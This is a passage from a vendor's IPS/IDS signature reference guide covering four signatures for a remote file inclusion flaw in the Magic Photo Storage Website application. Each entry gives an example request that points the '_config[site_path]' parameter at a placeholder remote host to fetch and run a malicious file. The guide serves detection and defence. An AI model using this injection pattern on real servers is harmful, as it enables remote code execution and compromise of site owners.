TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
769
from another remote system by http or https or ftp (INC=http;//[target]/[path]/[maliciousfile] ).While executing this
malicious file in our system the attacker can access what ever he wants as per the malicious code.
Signature ID: 34105
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. A remote attacker can send a specially-crafted URL request to add_welcome_text.php,
admin_email.php, add_templates.php , admin_paypal_email.php and index.php scripts are not properly sanitizing user
input <br>supplied to the '_config[site_path]' variable.It could upload a malicious file from another remote system by
http or https or ftp admin/admin_password.php?_config[site_path]=http;//[target]/[path]/[maliciousfile] ). While
executing this malicious file in our system the attacker can access what ever he wants as per the malicious code.
Signature ID: 34106
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. A remote attacker can send a specially-crafted URL request to change_catalog_template.php,
add_category.php, add_news.php, couple_milestone.php and user_email.php scripts are not properly sanitizing user
input supplied to the '_config[site_path]' variable. It could upload a malicious file from another remote system by http
or https or ftp (admin/admin_password.php?_config[site_path]=http;//[target]/[path]/[maliciousfile] ). While executing
this malicious file in our system the attacker can access whatever he wants as per the malicious code.
Signature ID: 34107
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. A remote attacker can send a specially-crafted URL request to couple_profile.php,
delete_category.php , login.php and logout.php scripts are not properly sanitizing user input supplied to the
'_config[site_path]' variable. It could upload a malicious file from another remote system by http or https or ftp
(admin/admin_password.php?_config[site_path]=http://[target]/[path]/[maliciousfile]). While executing this malicious
file in our system the attacker can access what ever he wants as per the malicious code.
Signature ID: 34108
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182
Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. A remote attacker can send a specially-crafted URL request to register.php, upload_photo.php,
user_catelog_password.php,<br> user_extend.php and user/user_membership_password.php scripts are not properly
sanitizing user input supplied to the '_config[site_path]' variable.It could upload a malicious file from another remote
system by http or https or ftp (admin/admin_password.php?_config[site_path]=http;//[target]/[path]/[maliciousfile]
).While executing this malicious file in our system the attacker can access what ever he wants as per the malicious
code.